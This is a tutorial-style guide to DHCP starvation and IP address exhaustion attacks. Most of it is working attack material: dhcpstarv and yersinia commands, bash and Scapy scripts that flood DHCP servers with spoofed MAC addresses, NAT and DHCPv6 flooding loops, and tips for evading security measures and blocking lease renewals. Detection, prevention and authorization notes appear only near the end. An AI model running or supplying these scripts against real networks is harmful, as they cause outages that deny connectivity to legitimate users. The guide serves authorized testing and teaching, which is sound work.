IP Address Exhaustion

Understanding IP Address Exhaustion - Network Resource Depletion

What is IP Address Exhaustion?

Simple Definition: IP address exhaustion attacks overwhelm network services that manage IP address allocation, preventing legitimate users from obtaining IP addresses and causing widespread network connectivity problems.

Technical Definition: IP address exhaustion attacks target Dynamic Host Configuration Protocol (DHCP) servers, Network Address Translation (NAT) systems, and IP allocation mechanisms to deplete available address pools through resource consumption, causing denial of service and network segmentation bypass opportunities.

Why IP Address Exhaustion Works

IP address exhaustion attacks succeed due to finite resource limitations and protocol design assumptions:

  • Limited Address Pools: IPv4 networks have finite IP address ranges available for allocation
  • Stateful Allocation: DHCP servers maintain state for allocated addresses with lease timers
  • No Authentication: Most IP allocation systems don’t authenticate or rate-limit requests
  • Automatic Allocation: Systems automatically grant addresses to requesting clients without verification

Attack Process Breakdown

Normal IP Address Allocation

  1. Pool Configuration: Administrator defines available IP address ranges
  2. Client Request: Device requests IP address through DHCP or other allocation method
  3. Address Assignment: Server allocates available address from pool
  4. Lease Management: Server tracks allocation with timeout mechanisms
  5. Address Recovery: Expired leases return addresses to available pool

Address Exhaustion Attack

  1. Pool Discovery: Identify target allocation systems and available address ranges
  2. Request Flooding: Generate massive numbers of allocation requests with unique identifiers
  3. Pool Depletion: Consume all available addresses in target pools
  4. Service Denial: Legitimate clients cannot obtain IP addresses
  5. Secondary Exploitation: Use connectivity disruption for further attacks

Real-World Impact

Network Service Denial: Prevent new devices from connecting to network infrastructure

Corporate Network Disruption: Employees unable to obtain IP addresses for work devices

Public WiFi Attacks: Exhaust guest network addresses to force users onto malicious networks

IoT Device Targeting: Prevent IoT devices from obtaining addresses during automated provisioning

VPN and Remote Access Impact: Block remote workers from establishing VPN connections

Technical Concepts

DHCP Address Allocation

DHCP Process (DORA):

  • Discover: Client broadcasts request for IP address
  • Offer: Server responds with available address offer
  • Request: Client formally requests offered address
  • Acknowledge: Server confirms allocation and lease terms

Lease Management: Addresses allocated for specific time periods with renewal mechanisms

Network Address Translation (NAT)

NAT Pool Exhaustion: Overwhelm available public IP addresses in NAT pools Port Exhaustion: Consume available port numbers for network address translation Session Table Flooding: Fill NAT session tables with fake connections

IPv6 Address Allocation

SLAAC Exhaustion: Deplete Stateless Address Autoconfiguration resources DHCPv6 Attacks: Target IPv6 DHCP servers with allocation flooding Prefix Delegation Abuse: Exhaust available IPv6 prefix delegations

Technical Implementation

Prerequisites

Network Requirements:

  • Access to network segment with DHCP or allocation services
  • Ability to generate multiple MAC addresses or client identifiers
  • Understanding of target network IP allocation policies

Essential Tools:

  • DHCPStarv: DHCP starvation and exhaustion tool
  • Yersinia: Layer 2/3 attack framework with DHCP capabilities
  • Nmap: Network discovery and service identification
  • Scapy: Custom DHCP packet crafting

Essential Command Sequence

Step 1: IP Allocation Service Discovery 

# Discover DHCP servers on network
nmap --script dhcp-discover 192.168.1.0/24
# Identifies active DHCP servers
# Shows available IP ranges and lease information
# Reveals server configuration and policies

# Monitor DHCP traffic patterns
tcpdump -i eth0 -v 'port 67 or port 68'
# Port 67: DHCP server port
# Port 68: DHCP client port
# Observe normal allocation request rates

# Test current DHCP functionality
dhclient -r eth0    # Release current lease
dhclient -v eth0    # Request new lease with verbose output
# Verify DHCP service responsiveness
# Understand lease duration and policies

Purpose: Identify DHCP infrastructure and understand normal allocation patterns before launching exhaustion attacks.

Step 2: Estimate Address Pool Size 

# Probe for DHCP pool boundaries
nmap --script dhcp-discover --script-args dhcp-discover.requests=50
# Multiple requests to identify pool size
# Reveals allocation patterns and available ranges

# Systematic address space probing
for i in {100..200}; do
    arping -c 1 192.168.1.$i >/dev/null 2>&1
    if [ $? -eq 0 ]; then
        echo "192.168.1.$i is active"
    fi
done
# Maps active addresses to estimate free pool
# Helps calculate required attack volume

Purpose: Determine the size of target address pools to plan effective exhaustion attacks.

Step 3: Basic DHCP Starvation Attack

Using DHCPStarv:

# Basic DHCP starvation attack
dhcpstarv -i eth0
# -i eth0: Network interface for attack
# Generates DHCP requests with random MAC addresses
# Continues until pool exhausted or stopped

# Monitor attack progress
tcpdump -i eth0 -c 100 'port 67 or port 68' | grep -c DHCP
# Count DHCP messages during attack
# Watch for NACK responses indicating pool exhaustion
# Track server response behavior changes

Using Yersinia:

# Interactive DHCP exhaustion
yersinia -I
# Select: DHCP protocol
# Choose: "sending discover packet" attack
# Configure MAC address generation options

# Command-line DHCP starvation
yersinia dhcp -attack 1 -interface eth0
# Attack 1: DHCP starvation
# Automatically generates unique MAC addresses
# Floods server with allocation requests

Step 4: Advanced Pool Exhaustion Techniques

Custom Starvation Script with Rate Control:

#!/bin/bash
# Systematic DHCP pool exhaustion
INTERFACE="eth0"
TOTAL_REQUESTS=1000

for i in $(seq 1 $TOTAL_REQUESTS); do
    # Generate unique MAC address
    MAC="02:$(printf '%02x' $((i % 256))):$(openssl rand -hex 4 | sed 's/\(..\)/\1:/g;s/:$//')"
    
    # Set interface MAC address
    ifconfig $INTERFACE down
    ifconfig $INTERFACE hw ether $MAC
    ifconfig $INTERFACE up
    
    # Request IP address with unique MAC
    timeout 10 dhclient -1 $INTERFACE 2>/dev/null
    
    echo "Request $i: MAC $MAC"
    
    # Rate limiting to avoid overwhelming interface
    sleep 1
done

Targeted Pool Exhaustion with Scapy:

#!/usr/bin/env python3
from scapy.all import *
import random

def generate_dhcp_discover(mac_addr):
    """Generate DHCP discover packet with specified MAC"""
    return Ether(dst="ff:ff:ff:ff:ff:ff", src=mac_addr)/\
           IP(src="0.0.0.0", dst="255.255.255.255")/\
           UDP(sport=68, dport=67)/\
           BOOTP(chaddr=[mac_addr])/\
           DHCP(options=[("message-type", "discover"), "end"])

# Exhaust DHCP pool with custom packets
for i in range(1000):
    # Generate random MAC address
    mac = "02:%02x:%02x:%02x:%02x:%02x" % (
        random.randint(0, 255), random.randint(0, 255),
        random.randint(0, 255), random.randint(0, 255),
        random.randint(0, 255)
    )
    
    # Send DHCP discover
    sendp(generate_dhcp_discover(mac), iface="eth0")
    
    if i % 100 == 0:
        print(f"Sent {i} DHCP discover packets")

Step 5: Verify Exhaustion Success 

# Test legitimate client allocation failure
dhclient -r eth0          # Release any existing lease
dhclient -v eth0 2>&1 | grep -i "no offers"
# Should fail to obtain address if pool exhausted
# "No DHCP offers received" indicates successful attack

# Monitor DHCP server responses
tcpdump -i eth0 -v 'port 67' | grep -E "(NACK|NAK)"
# DHCP NACK responses indicate pool exhaustion
# Server rejecting requests due to no available addresses

# Verify pool status (if server access available)
# From DHCP server:
dhcp-lease-list | wc -l
# Count active leases
# Should approach or exceed pool size

Purpose: Confirm that DHCP pool exhaustion has been achieved and legitimate clients cannot obtain addresses.

Attack Variations

Selective Device Targeting 

# Target specific device types by MAC OUI
# VMware devices
yersinia dhcp -attack 1 -mac-prefix "00:50:56"
# Apple devices  
yersinia dhcp -attack 1 -mac-prefix "a4:c3:61"
# Dell devices
yersinia dhcp -attack 1 -mac-prefix "00:14:22"

# Useful in environments with mixed device types
# Can target corporate vs personal devices selectively

NAT Pool Exhaustion 

# Exhaust NAT pool through connection flooding
for port in {1024..65535}; do
    hping3 -c 1 -S -p 80 -s $port 8.8.8.8 &
done
# Creates many outbound connections
# Exhausts available NAT translations
# Prevents legitimate outbound connectivity

IPv6 Address Exhaustion 

# DHCPv6 starvation attack
# Generate random DUID (DHCP Unique Identifier)
for i in {1..1000}; do
    DUID="00:01:00:01:$(printf '%08x' $RANDOM):$(openssl rand -hex 6)"
    dhclient -6 -D $DUID eth0 2>/dev/null &
done

# SLAAC prefix exhaustion
# Generate unique IPv6 addresses using EUI-64
# Overwhelm neighbor discovery cache

Common Issues and Solutions

Problem: DHCP server not responding to attack

  • Solution: Verify network connectivity, check for DHCP relay configuration, ensure proper interface setup

Problem: Limited impact from exhaustion attack

  • Solution: Increase request rate, verify target pool size, check for multiple DHCP servers

Problem: Attack blocked by security measures

  • Solution: Use legitimate vendor OUIs for MAC addresses, vary request timing, reduce attack intensity

Problem: Pool recovers too quickly

  • Solution: Maintain continuous low-level attack, prevent lease renewals, target multiple pools simultaneously

Advanced Techniques

Lease Renewal Prevention 

# Prevent lease renewals to maintain exhaustion
#!/bin/bash
# Monitor for DHCP renewal attempts and interfere

tcpdump -i eth0 -l 'port 67 or port 68' | while read line; do
    if echo "$line" | grep -q "DHCP Request"; then
        # Extract client MAC and send fake NACK
        # Requires packet crafting to forge server response
        echo "Blocking renewal attempt"
    fi
done

Multi-Server Coordination 

# Coordinate attacks against multiple DHCP servers
SERVERS=("192.168.1.1" "192.168.1.2" "192.168.1.3")

for server in "${SERVERS[@]}"; do
    dhcpstarv -i eth0 -s $server &
done
# Exhausts multiple server pools simultaneously
# More effective in redundant DHCP environments

DHCP Option Abuse 

#!/usr/bin/env python3
from scapy.all import *

# DHCP discover with unusual options
dhcp_packet = Ether(dst="ff:ff:ff:ff:ff:ff")/\
              IP(src="0.0.0.0", dst="255.255.255.255")/\
              UDP(sport=68, dport=67)/\
              BOOTP()/\
              DHCP(options=[
                  ("message-type", "discover"),
                  ("requested_addr", "192.168.1.999"),  # Invalid address
                  ("param_req_list", [1,3,6,15] * 50),  # Excessive options
                  "end"
              ])

sendp(dhcp_packet, iface="eth0")
# May trigger parsing errors or resource consumption

Detection and Prevention

Detection Indicators

  • Rapid increase in DHCP requests from single interface
  • DHCP requests with sequential or suspicious MAC addresses
  • High volume of DHCP discover packets without corresponding requests
  • Pool utilization approaching 100% unexpectedly
  • DHCP server CPU or memory utilization spikes

Prevention Measures

DHCP Server Configuration:

# Configure rate limiting per client
lease-limit 3;              # Maximum 3 leases per client
ping-check true;            # Verify address availability
conflict-detection true;    # Enable address conflict detection

# Implement MAC address filtering
deny unknown-clients;       # Only serve known MAC addresses

Network Design:

  • Implement DHCP snooping on switches
  • Configure appropriate pool sizes for expected clients
  • Deploy multiple DHCP servers with split pools
  • Use DHCP relay agents to centralize management

Monitoring and Alerting:

  • Monitor DHCP pool utilization trends
  • Alert on rapid lease consumption
  • Track MAC address request patterns
  • Implement network access control (NAC)

Professional Context

Legitimate Use Cases

  • Security Testing: Validating DHCP security configurations and resilience
  • Capacity Planning: Testing DHCP server capacity and failover mechanisms
  • Network Troubleshooting: Understanding DHCP allocation behavior under stress
  • Disaster Recovery: Testing DHCP service continuity and recovery procedures

Legal and Ethical Requirements

Authorization: IP exhaustion attacks can cause widespread network outages - explicit written permission essential

Scope Definition: Clearly identify which network segments and DHCP services are in-scope

Impact Assessment: Document potential for complete network connectivity loss

Recovery Planning: Ensure ability to restore DHCP services and clear exhausted pools quickly

IP address exhaustion attacks demonstrate the critical importance of proper DHCP security configuration and capacity planning, highlighting how fundamental network services can become attack vectors when improperly secured.